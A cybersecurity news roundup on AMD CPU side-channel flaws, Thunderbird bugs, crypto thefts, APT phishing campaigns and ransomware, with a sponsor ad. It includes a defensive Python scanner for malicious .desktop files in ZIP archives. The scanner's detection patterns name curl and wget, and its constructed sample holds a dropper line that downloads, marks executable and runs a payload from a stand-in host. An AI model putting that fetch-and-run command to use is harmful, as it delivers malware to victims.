Cybersecurity News: AMD has CPU meltdown, Mozilla Thunderbird has vulnerabilities, Indian defense sector attacked

In today’s cybersecurity news…

AMD warns of new Meltdown, Spectre-like bugs affecting CPUs

AMD disclosed a new side-channel vulnerability dubbed the Transient Scheduler Attack (TSA), affecting a wide range of its chips, including Ryzen and EPYC processors. The individual flaws are rated low to medium severity, but Trend Micro and CrowdStrike both consider the threat critical due to potential kernel data leakage. The attack requires local code execution, and AMD has issued patches and recommends sysadmins update affected systems.

(The Register)

Multiple vulnerabilities in Mozilla Thunderbird could allow for arbitrary code execution

Multiple vulnerabilities in Mozilla Thunderbird—some rated high severity—could allow arbitrary code execution, potentially letting attackers install programs or access sensitive data, especially on systems with admin privileges. The flaws include a critical use-after-free bug and memory safety issues, though there are no known active exploits. Users are urged to update to version 140 or later, apply least-privilege principles, and follow patch management and endpoint protection best practices.

(CiSecurity)

Bitcoin Depot breach exposes data of nearly 27,000 crypto users, more than $40 million stolen from GMX crypto platform

Just hours after Bitcoin Depot, a major Bitcoin ATM operator, disclosed a breach affecting nearly 27,000 users, decentralized crypto exchange GMX confirmed a $43 million theft from its platform due to an exploit. GMX says it had undergone top-tier security audits but has now suspended trading and is offering the attacker a 10% bounty for the return of stolen funds.

(Bleeping Computer, The Record)

Threat actor targeting Indian defense sector

A new report from CYFIRMA reveals Pakistani-linked APT36 is targeting India’s defense sector with a phishing campaign exploiting BOSS Linux, widely used in Indian government systems. The attack uses ZIP files containing malicious Linux .desktop shortcuts that download decoy PowerPoint files while deploying an ELF binary for unauthorized access. Experts warn the shift to Linux shows evolving tactics and call for stronger email filtering, endpoint monitoring, user training, and least-privilege access to counter persistent threats in government infrastructure.

(Security Magazine)
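The APT36 campaign above hinges on a ZIP attachment carrying a Linux .desktop launcher that fetches and runs a binary while posing as a document. As an added illustration (not from CYFIRMA's report or the original article), the script below shows how a mail gateway or triage script could parse .desktop entries inside a ZIP and flag downloader-style Exec lines; the heuristics, file names and the sample archive are constructed for this example.

```python
import io
import re
import zipfile

# Constructed heuristics: things a legitimate application launcher rarely does.
SUSPICIOUS_EXEC = {
    "network fetch": re.compile(r"\b(curl|wget)\b"),
    "marks dropped file executable": re.compile(r"\bchmod\s+\+x\b"),
    "decodes embedded payload": re.compile(r"\bbase64\b"),
    "stages in world-writable dir": re.compile(r"/tmp/|/dev/shm/"),
    "shell wrapper": re.compile(r"\b(sh|bash)\s+-c\b"),
}
DECOY_DOC = re.compile(r"\.(pptx?|docx?|pdf)\b", re.IGNORECASE)

def parse_desktop(text):
    """Return the key/value pairs of the [Desktop Entry] group only."""
    entry, in_group = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("["):
            in_group = line == "[Desktop Entry]"
        elif in_group and "=" in line:
            key, _, value = line.partition("=")
            entry[key.strip()] = value.strip()
    return entry

def desktop_findings(text):
    """List the reasons a .desktop launcher looks like a downloader/dropper."""
    entry = parse_desktop(text)
    exec_line = entry.get("Exec", "")
    findings = [label for label, pat in SUSPICIOUS_EXEC.items() if pat.search(exec_line)]
    if DECOY_DOC.search(entry.get("Name", "")):
        findings.append("launcher disguised as a document")
    return findings

def scan_zip(data):
    """Map every .desktop member of a ZIP (given as bytes) to its findings."""
    report = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.filename.lower().endswith(".desktop"):
                text = zf.read(info).decode("utf-8", errors="replace")
                report[info.filename] = desktop_findings(text)
    return report

def build_sample_zip():
    """Constructed attachment: a benign launcher beside a dropper-style one."""
    benign = "[Desktop Entry]\nType=Application\nName=Calculator\nExec=gnome-calculator\n"
    dropper = ("[Desktop Entry]\nType=Application\nName=Briefing.pptx\n"
               "Exec=sh -c \"curl -s http://example.invalid/p -o /tmp/.s; chmod +x /tmp/.s; /tmp/.s\"\n")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("calc.desktop", benign)
        zf.writestr("Briefing.pptx.desktop", dropper)
    return buf.getvalue()
```

Running `scan_zip(build_sample_zip())` reports the calculator launcher as clean and the disguised one with five findings; in practice the same check belongs in attachment sandboxing alongside blocking .desktop files outright, since users have no legitimate reason to receive them by mail.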

Huge thanks to our sponsor, Vanta

Do you know the status of your compliance controls right now? Like…right now?

We know that real-time visibility is critical for security, but when it comes to our GRC programs…we rely on point-in-time checks.

But more than 9,000 companies have continuous visibility into their controls with Vanta. Vanta brings automation to evidence collection across over 35 frameworks, like SOC 2 and ISO 27001.

They also centralize key workflows like policies, access reviews, and reporting, and help you get security questionnaires done 5 times faster with AI. Now that’s…a new way to GRC.

Get started at Vanta.com/headlines

Ruckus Networks leaves severe flaws unpatched in management devices

Researchers have disclosed multiple severe vulnerabilities in Ruckus Networks’ Virtual SmartZone (vSZ) and Ruckus Network Director (RND), including hardcoded SSH keys, unauthenticated remote code execution, and weak secret management—none of which have been patched. The flaws could allow attackers full control over wireless infrastructure, especially in large-scale deployments. Carnegie Mellon’s CERT/CC says Ruckus and parent company CommScope have not responded to disclosure attempts. Until patches are released, admins are urged to isolate management interfaces and enforce secure access protocols.

(Bleeping Computer)

The Czech Republic bans DeepSeek in state administration over cybersecurity concerns

The Czech Republic has banned Chinese AI startup DeepSeek from use in state administration over cybersecurity concerns, citing risks of unauthorized data access due to China’s data laws. The decision follows a warning from the country’s cybersecurity agency and mirrors similar moves by Italy and Australia. DeepSeek was founded in 2023 and released its first large language model the same year.

(ABC News)

Ingram Micro starts restoring systems after ransomware attack

Ingram Micro is restoring systems following a global ransomware attack by the SafePay group that hit just before July 4. The attack took down ordering systems and forced employees to work remotely. The company has resumed taking phone and email orders in multiple countries and reset all passwords and MFA. Internal systems tied to logistics and fulfillment are gradually coming back online, but full recovery is ongoing. It’s unclear if data was stolen, though SafePay is known for exfiltration in similar attacks.

(Bleeping Computer)

DoNot APT Expands Operations, Targets European Foreign Ministries with LoptikMod Malware

Cybersecurity firm Trellix says Indian-linked APT group “DoNot Team” targeted a European foreign ministry with its custom LoptikMod malware, delivered via phishing emails impersonating defense officials. The malware, active since at least 2018, enables data exfiltration, remote access, and long-term persistence, using anti-analysis and evasion techniques. Though the campaign’s command-and-control server is now offline, the attack signals a shift in DoNot’s focus from South Asia to European diplomatic targets.

(The Hacker News)